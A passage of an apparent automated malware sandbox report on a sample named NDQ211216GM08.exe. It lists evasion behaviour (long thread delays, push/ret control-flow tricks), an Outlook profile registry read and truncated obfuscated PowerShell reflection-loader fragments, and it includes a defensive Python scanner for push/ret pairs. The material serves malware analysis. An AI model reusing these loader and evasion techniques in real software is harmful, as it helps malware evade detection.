es.dll, bitsproxy.dll, dhcpcsvc6.dll, dhcpcsvc.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, dpapi.dll, mpr.dll
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Sections loaded: wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, mscoree.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, dhcpcsvc6.dll, dhcpcsvc.dll, secur32.dll
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: NDQ211216GM08.exe.bin.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          Source: Yara matchFile source: 00000001.00000002.1434300899.000000000A131000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Temporals $Renovationsvsnet $Juvelbelgningens239), (Coagulable @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Recidivets = [AppDomain]::CurrentDomain.GetA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Jeanett)), $Sofabordene122).DefineDynamicModule($Perfect, $false).DefineType($Undermenuers150, $Flamineous, [System.MulticastDelegate]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08B80C27 push 8B05B59Fh; iretd 1_2_08B80C30
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_3_0019CA98 pushfd ; retf 0019h11_3_0019CA99
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_3_0019EE8C push eax; iretd 11_3_0019EEA9
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_3_0019CF4C push eax; iretd 11_3_0019CF4D
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_3_0019EE60 push eax; iretd 11_3_0019EE65
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_00159C30 push esp; retf 0017h 11_2_00159D55
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_00154908 push eax; ret 11_2_00154922
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_00154938 push eax; ret 11_2_00154932
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_0015496A push eax; ret 11_2_00154982
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_00154998 push eax; ret 11_2_001549A2
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_00154988 push eax; ret 11_2_00154992
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_016C41EE push ecx; iretd 11_2_016C41F9
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_016C11DA pushfd; iretd 11_2_016C11DD
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_016C241C push edx; iretd 11_2_016C242F
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_016C50BD push EB39B21Fh; iretd 11_2_016C50C2
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_016C3317 push esp; retf 11_2_016C3375
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_016C3386 push esp; retf 11_2_016C3375
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_016C5616 push es; iretd 11_2_016C5614
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_016C5ACD push edi; iretd 11_2_016C5ACE
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_016C56CA push DFDEEA70h; iretd 11_2_016C56D1
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_016C4EB9 push ecx; iretd 11_2_016C4EBA
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | File created: C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Nonalined.exe
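The "Code function" rows above are the sandbox flagging a push immediately followed by ret, retf or iretd: "push imm32; ret" is an indirect jump to the pushed value that a static call graph does not see, "push esp; retf" changes CS:EIP from stack data, and iretd pops EIP, CS and EFLAGS, so the code must have staged three dwords on the stack first. The scanner below is an added example written for this report, not Joe Sandbox's detector and not code from the sample; it byte-scans a buffer for exactly those pairs and prints them in the report's "push X; ret" wording. The opcode tables cover the 32-bit one-byte forms that appear in the rows, and the sample bytes are constructed (their encodings follow the rows, e.g. push EB39B21Fh; iretd and push esp; retf 0017h).

```python
# Opcode bytes (32-bit mode) for the instruction pairs the report lists.
PUSH_REG = {0x50 + i: r for i, r in enumerate(("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"))}
PUSH_SEG = {0x06: "es", 0x0E: "cs", 0x16: "ss", 0x1E: "ds"}
PUSH_IMM32, PUSHFD = 0x68, 0x9C
# ret/retf/iretd opcode -> (mnemonic, size of the trailing imm16 operand)
RETURNS = {0xC3: ("ret", 0), 0xC2: ("ret", 2), 0xCB: ("retf", 0), 0xCA: ("retf", 2), 0xCF: ("iretd", 0)}


def _push_at(code, i):
    """Decode a push at code[i]; return (text, instruction length) or None."""
    b = code[i]
    if b in PUSH_REG:
        return f"push {PUSH_REG[b]}", 1
    if b in PUSH_SEG:
        return f"push {PUSH_SEG[b]}", 1
    if b == PUSHFD:
        return "pushfd", 1
    if b == PUSH_IMM32 and i + 5 <= len(code):
        imm = int.from_bytes(code[i + 1:i + 5], "little")
        return f"push {imm:08X}h", 5
    return None


def scan_push_ret(code, base=0):
    """Return [(address, 'push X; ret...')] for every push directly followed by ret,
    retf or iretd. This is byte scanning, not disassembly: a pair can also sit inside
    another instruction's operand bytes (mov eax, 0C350h contains 50 C3), so confirm
    hits in a disassembler before reporting them."""
    hits, i = [], 0
    while i < len(code):
        push = _push_at(code, i)
        j = i + push[1] if push else len(code)
        if push and j < len(code) and code[j] in RETURNS:
            name, imm_len = RETURNS[code[j]]
            if j + 1 + imm_len <= len(code):
                text = f"{push[0]}; {name}"
                if imm_len:
                    operand = int.from_bytes(code[j + 1:j + 1 + imm_len], "little")
                    text += f" {operand:04X}h"
                hits.append((base + i, text))
                i = j + 1 + imm_len
                continue
        i += 1
    return hits


# Constructed sample: a normal prologue (push ebp; mov ebp, esp), a nop, and pairs
# encoded after the report's rows. Not bytes from the analysed sample.
SAMPLE_CODE = bytes([
    0x55, 0x8B, 0xEC,                    # push ebp; mov ebp, esp  (no hit)
    0x50, 0xC3,                          # push eax; ret
    0x90,                                # nop
    0x68, 0x1F, 0xB2, 0x39, 0xEB, 0xCF,  # push EB39B21Fh; iretd
    0x54, 0xCA, 0x17, 0x00,              # push esp; retf 0017h
    0x9C, 0xCF,                          # pushfd; iretd
    0x06, 0xCF,                          # push es; iretd
    0xC3,                                # lone ret (no hit)
])

if __name__ == "__main__":
    for addr, text in scan_push_ret(SAMPLE_CODE, base=0x016C0000):
        print(f"{addr:08X} {text}")
```

Pass it the bytes of an unpacked region (for example a dump of the 016C0000 region the rows refer to) with `base` set to that region's load address and the output lines up with the report's function addresses.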

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical rows)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical rows)
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (129 identical rows)
          Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Process information set: NOOPENFILEERRORBOX (61 identical rows)

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | API/Special instruction interceptor: Address: 33B8475
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Memory allocated: 110000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Memory allocated: 20250000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Memory allocated: 20050000 memory reserve | memory write watch
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 600000
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 599891
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 599781
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 599672
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 599563
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 599453
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 599342
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 599234
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 599125
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 599016
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 598891
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 598759
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 598654
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 598542
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 598427
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 598312
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 598203
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 598093
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 597984
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 597875
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 597766
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 597656
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 597547
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 597437
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 597328
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 597219
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 597094
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 596984
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 596875
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 596766
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 596656
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 596547
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 596438
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 596313
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 596203
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 596094
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 595966
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 595808
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 595694
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 595577
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 595469
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 595359
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 595250
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 595141
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 595031
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 594922
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 594812
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 594703
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 594594
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Thread delayed: delay time: 594469
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6677
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2986
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Window / User API: threadDelayed 1559
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Window / User API: threadDelayed 8297
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeAPI coverage: 2.5 %
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5548Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 964Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep count: 31 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -28592453314249787s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599891s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1220Thread sleep count: 1559 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1220Thread sleep count: 8297 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599781s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599672s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599563s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599453s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599342s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599234s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599125s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599016s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598891s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598759s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598654s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598542s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598427s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598312s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598203s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598093s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597984s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597875s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597766s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597656s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597547s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597437s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597328s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597219s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597094s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596984s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596875s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596766s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596656s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596547s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596438s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596313s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596203s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596094s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595966s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595808s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595694s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595577s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595469s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595359s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595250s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595141s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595031s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -594922s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -594812s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -594703s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -594594s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -594469s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0040290B FindFirstFileW,11_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_00405C13
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0040683D FindFirstFileW,FindClose,11_2_0040683D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599891Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599672Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599563Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599342Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599234Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599125Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599016Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598891Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598759Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598654Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598542Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598427Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598312Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598203Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598093Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597984Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597656Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597547Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597437Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597328Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597219Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596984Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596656Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596547Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596438Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596313Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596203Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595966Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595808Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595694Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595577Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595469Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595359Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595250Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595141Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595031Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 594922Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 594812Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 594703Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 594594Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 594469Jump to behavior
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\jr
          Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\jr
          Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
